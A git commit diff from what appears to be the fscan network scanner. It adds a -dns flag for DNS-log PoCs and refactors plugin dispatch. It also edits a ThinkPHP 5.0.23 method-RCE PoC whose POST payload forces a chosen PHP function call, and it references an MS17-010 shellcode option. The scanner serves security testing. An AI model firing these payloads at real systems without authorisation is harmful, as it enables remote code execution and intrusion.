增加-dns参数启用dnslog poc

2022-08-16 11:18:09 +08:00 · 2022-08-16 11:18:09 +08:00 · 98569648bb
parent 9b0f12c31a
commit 98569648bb
7 changed files with 37 additions and 40 deletions
--- a/Plugins/scanner.go
+++ b/Plugins/scanner.go
@ -1,7 +1,6 @@
 package Plugins

 import (
-	"errors"
 	"fmt"
 	"github.com/shadow1ng/fscan/WebScan/lib"
 	"github.com/shadow1ng/fscan/common"
@ -21,6 +20,8 @@ func Scan(info common.HostInfo) {
 	lib.Inithttp(common.Pocinfo)
 	var ch = make(chan struct{}, common.Threads)
 	var wg = sync.WaitGroup{}
+	web := strconv.Itoa(common.PORTList["web"])
+	ms17010 := strconv.Itoa(common.PORTList["ms17010"])
 	if len(Hosts) > 0 || len(common.HostPort) > 0 {
 		if common.IsPing == false && len(Hosts) > 0 {
 			Hosts = CheckLive(Hosts, common.Ping)
@ -30,6 +31,7 @@ func Scan(info common.HostInfo) {
 			common.LogWG.Wait()
 			return
 		}
+		common.GC()
 		var AlivePorts []string
 		if common.Scantype == "webonly" {
 			AlivePorts = NoPortScan(Hosts, info.Ports)
@ -47,6 +49,7 @@ func Scan(info common.HostInfo) {
 			common.HostPort = nil
 			fmt.Println("[*] AlivePorts len is:", len(AlivePorts))
 		}
+		common.GC()
 		var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
 		for _, port := range common.PORTList {
 			severports = append(severports, strconv.Itoa(port))
@ -56,31 +59,30 @@ func Scan(info common.HostInfo) {
 			info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
 			if common.Scantype == "all" || common.Scantype == "main" {
 				switch {
-				case info.Ports == "135":
-					AddScan(info.Ports, info, ch, &wg) //findnet
 				case info.Ports == "445":
+					AddScan(ms17010, info, &ch, &wg) //ms17010
 					//AddScan(info.Ports, info, ch, &wg)  //smb
-					AddScan("1000001", info, ch, &wg) //ms17010
 					//AddScan("1000002", info, ch, &wg) //smbghost
 				case info.Ports == "9000":
-					AddScan(info.Ports, info, ch, &wg) //fcgiscan
-					AddScan("1000003", info, ch, &wg)  //http
+					AddScan(web, info, &ch, &wg)        //http
+					AddScan(info.Ports, info, &ch, &wg) //fcgiscan
 				case IsContain(severports, info.Ports):
-					AddScan(info.Ports, info, ch, &wg) //plugins scan
+					AddScan(info.Ports, info, &ch, &wg) //plugins scan
 				default:
-					AddScan("1000003", info, ch, &wg) //webtitle
+					AddScan(web, info, &ch, &wg) //webtitle
 				}
 			} else {
-				port, _ := common.PORTList[common.Scantype]
-				scantype := strconv.Itoa(port)
-				AddScan(scantype, info, ch, &wg)
+				scantype := strconv.Itoa(common.PORTList[common.Scantype])
+				AddScan(scantype, info, &ch, &wg)
 			}
 		}
 	}
+	common.GC()
 	for _, url := range common.Urls {
 		info.Url = url
-		AddScan("1000003", info, ch, &wg)
+		AddScan(web, info, &ch, &wg)
 	}
+	common.GC()
 	wg.Wait()
 	common.LogWG.Wait()
 	close(common.Results)
@ -89,35 +91,26 @@ func Scan(info common.HostInfo) {

 var Mutex = &sync.Mutex{}

-func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.WaitGroup) {
+func AddScan(scantype string, info common.HostInfo, ch *chan struct{}, wg *sync.WaitGroup) {
+	*ch <- struct{}{}
 	wg.Add(1)
 	go func() {
 		Mutex.Lock()
 		common.Num += 1
 		Mutex.Unlock()
-		ScanFunc(PluginList, scantype, &info)
+		ScanFunc(&scantype, &info)
 		Mutex.Lock()
 		common.End += 1
 		Mutex.Unlock()
-		<-ch
 		wg.Done()
+		<-*ch
 	}()
-	ch <- struct{}{}
 }

-func ScanFunc(m map[string]interface{}, name string, infos ...interface{}) (result []reflect.Value, err error) {
-	f := reflect.ValueOf(m[name])
-	if len(infos) != f.Type().NumIn() {
-		err = errors.New("The number of infos is not adapted ")
-		fmt.Println(err.Error())
-		return result, nil
-	}
-	in := make([]reflect.Value, len(infos))
-	for k, info := range infos {
-		in[k] = reflect.ValueOf(info)
-	}
-	result = f.Call(in)
-	return result, nil
+func ScanFunc(name *string, info *common.HostInfo) {
+	f := reflect.ValueOf(PluginList[*name])
+	in := []reflect.Value{reflect.ValueOf(info)}
+	f.Call(in)
 }

 func IsContain(items []string, item string) bool {
--- a/WebScan/lib/check.go
+++ b/WebScan/lib/check.go
@ -82,7 +82,9 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
 	for _, item := range p.Set {
 		k, expression := item.Key, item.Value
 		if expression == "newReverse()" {
-			return false, nil, ""
+			if !common.DnsLog {
+				return false, nil, ""
+			}
 			variableMap[k] = newReverse()
 			continue
 		}
--- a/WebScan/pocs/thinkphp5023-method-rce.yml
+++ b/WebScan/pocs/thinkphp5023-method-rce.yml
@ -1,6 +1,4 @@
 name: poc-yaml-thinkphp5023-method-rce
-set:
-  rand: randomLowercase(10)
 groups:
  poc1:
  - method: POST
@ -8,9 +6,9 @@ groups:
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
-      _method=__construct&filter[]=var_dump&method=GET&get[]={{rand}}
+      _method=__construct&filter[]=printf&method=GET&get[]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu
    expression: |
-      response.body.bcontains(bytes(rand))
+      response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu")
  poc2:
  - method: POST
    path: /index.php?s=captcha
--- a/common/config.go
+++ b/common/config.go
@ -99,6 +99,7 @@ var (
 )

 var (
+	DnsLog     bool
 	PocNum     int
 	PocFull    bool
 	CeyeDomain string
--- a/common/flag.go
+++ b/common/flag.go
@ -10,13 +10,17 @@ import (
 func init() {
 	go func() {
 		for {
-			runtime.GC()
-			debug.FreeOSMemory()
+			GC()
 			time.Sleep(10 * time.Second)
 		}
 	}()
 }

+func GC() {
+	runtime.GC()
+	debug.FreeOSMemory()
+}
+
 func Banner() {
 	banner := `
   ___                              _    
@ -72,6 +76,7 @@ func Flag(Info *HostInfo) {
 	flag.StringVar(&Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work")
 	flag.StringVar(&Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login")
 	flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout")
+	flag.BoolVar(&DnsLog, "dns", false, "using dnslog poc")
 	flag.IntVar(&PocNum, "num", 20, "poc rate")
 	flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add")
 	flag.Parse()
--- a/go.mod
+++ b/go.mod
@ -19,7 +19,6 @@ require (
 	golang.org/x/text v0.3.6
 	google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0
 	gopkg.in/yaml.v2 v2.4.0
-	gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b // indirect
 )

 replace github.com/tomatome/grdp v0.0.0-20211231062539-be8adab7eaf3 => github.com/shadow1ng/grdp v1.0.3
--- a/go.sum
+++ b/go.sum
@ -50,8 +50,6 @@ github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7
 github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4=
 github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo=
 github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4IgpuI1SZQ=
-github.com/geoffgarside/ber v1.1.0 h1:qTmFG4jJbwiSzSXoNJeHcOprVzZ8Ulde2Rrrifu5U9w=
-github.com/geoffgarside/ber v1.1.0/go.mod h1:jVPKeCbj6MvQZhwLYsGwaGI52oUorHoHKNecGT85ZCc=
 github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
 github.com/go-gl/gl v0.0.0-20181026044259-55b76b7df9d2/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk=
 github.com/go-gl/gl v0.0.0-20190320180904-bf2b1f2f34d7/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk=
@ -255,7 +253,6 @@ golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8U
 golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
 golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
 golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
-golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
 golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
 golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
 golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a h1:kr2P4QFmQr29mSLA43kwrOcgcReGTfbE9N577tCTuBc=
@ -331,6 +328,8 @@ golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7w
 golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20210423082822-04245dca01da h1:b3NXsE2LusjYGGjL5bxEVZZORm/YEFFrWFjR8eFrw/c=
+golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E=
 golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
 golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=